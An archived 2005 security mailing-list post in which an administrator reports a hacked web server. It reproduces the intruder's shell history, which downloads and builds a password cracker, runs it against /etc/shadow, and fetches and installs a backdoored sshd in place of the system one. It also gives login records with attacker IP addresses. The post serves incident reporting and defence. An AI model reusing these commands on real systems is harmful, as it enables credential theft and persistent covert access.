[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

SSH compiled with backdoor

To: incidents@xxxxxxxxxxxxxxxxx
Subject: SSH compiled with backdoor
From: steve@xxxxxxxxxxx
Date: 27 Aug 2005 13:02:08 -0000
Delivered-to: mailing list incidents@xxxxxxxxxxxxxxxxx
Delivered-to: moderator for incidents@xxxxxxxxxxxxxxxxx
List-help: <mailto:incidents-help@securityfocus.com>
List-id: <incidents.list-id.securityfocus.com>
List-post: <mailto:incidents@securityfocus.com>
List-subscribe: <mailto:incidents-subscribe@securityfocus.com>
List-unsubscribe: <mailto:incidents-unsubscribe@securityfocus.com>
Mailing-list: contact incidents-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Hi!

One of my web servers was hacked on July 17, 2005.  bash_history showed:

w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm -rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot

According to john, a couple of users had weak passwords, but root seemed well protected.  From looking in all the bash_history, it appears the hacker came in from the website account, and did an su from there.

I found this about a month later when I logged into the box, did an ls, only to be met by a seg fault.  A ps x showed mech.tgz trying to be downloaded, and a bunch of other CRON processes running.  The auth log didn't show other logins, though, so the ssh installed must have logging turned off for the backdoor they installed.

I filled out an abuse form at geocities for the accounts hosting the software after downloading the software (I couldn't find the tgz files on my system).

Last showed:
reboot   system boot  2.4.18-bf2.4     Sun Jul 17 18:15         (37+11:47)  
website  pts/0        193.231.77.74    Sun Jul 17 17:42 - down   (00:27)    
website  pts/1        193.231.77.74    Sun Jul 17 17:05 - 17:26  (00:20)    
website  pts/0        211.43.207.169   Sun Jul 17 16:26 - 17:41  (01:14)    

whois says:
inetnum:      193.231.77.0 - 193.231.77.255
netname:      DATANET-RO
descr:        Starnets - Datanet
country:      RO
address:      DATA NET
address:      Str. Ioan N. Roman Nr. 13
address:      Constanta, cod 900199, ROMANIA

Best Regards,

Steve

Follow-Ups:
- Re: SSH compiled with backdoor
  - From: Francesca Smith
- Re: SSH compiled with backdoor
  - From: Javier Fernandez-Sanguino

Prev by Date: strange icmp echo request
Next by Date: Re: cuebot-d infection method
Previous by thread: strange icmp echo request
Next by thread: Re: SSH compiled with backdoor
Index(es):
- Date
- Thread